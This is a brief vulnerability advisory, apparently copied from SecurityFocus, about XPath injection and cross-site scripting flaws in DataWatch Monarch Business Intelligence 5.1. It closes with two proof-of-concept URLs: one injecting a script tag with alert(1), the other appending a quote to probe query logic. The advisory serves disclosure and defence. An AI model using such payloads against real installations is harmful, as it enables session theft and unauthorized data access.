11 lines
No EOL
975 B
Text
11 lines
No EOL
975 B
Text
source: https://www.securityfocus.com/bid/54733/info
|
|
|
|
DataWatch Monarch Business Intelligence is prone to multiple input validation vulnerabilities.
|
|
|
|
Successful exploits will allow an attacker to manipulate the XPath query logic to carry out unauthorized actions on the XML documents of the application. It will also allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
|
|
|
|
DataWatch Monarch Business Intelligence 5.1 is vulnerable; other versions may also be affected.
|
|
|
|
http://www.example.com/ESAdmin/jsp/tabview.jsp?mode=add</script><script>alert(1)</script>&type=2&renew=1&pageid=PAGE_MPROCESS
|
|
|
|
http://www.example.com/ESClient/jsp/customizedialog.jsp?templateType=-1&doctypeid=122&activetab=DM_DOCUMENT_LIST&fields=filter;sort;summary;&searchtype=document'&doclist.jsp |